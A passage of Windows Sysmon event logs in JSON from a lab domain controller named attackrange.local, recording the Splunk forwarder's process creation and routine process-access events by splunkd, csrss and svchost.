{"EventTime":"2020-08-01 05:51:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4176,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:50.247\r\nProcessGuid: {A837DB8D-02F6-5F25-0000-0010042E0600}\r\nProcessId: 5116\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:51:50.247","ProcessGuid":"{A837DB8D-02F6-5F25-0000-0010042E0600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4177,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:50.247\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-02F6-5F25-0000-0010042E0600}\r\nTargetProcessId: 5116\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:50.247","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-02F6-5F25-0000-0010042E0600}","TargetProcessId":"5116","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4178,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:50.247\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-02F6-5F25-0000-0010042E0600}\r\nTargetProcessId: 5116\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:50.247","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-02F6-5F25-0000-0010042E0600}","TargetProcessId":"5116","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4179,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:50.247\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:50.247","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4180,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:50.247\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:50.247","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4181,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:50.247\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:50.247","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4182,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:50.247\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:50.247","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4183,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:50.247\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:50.247","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4184,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:50.247\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 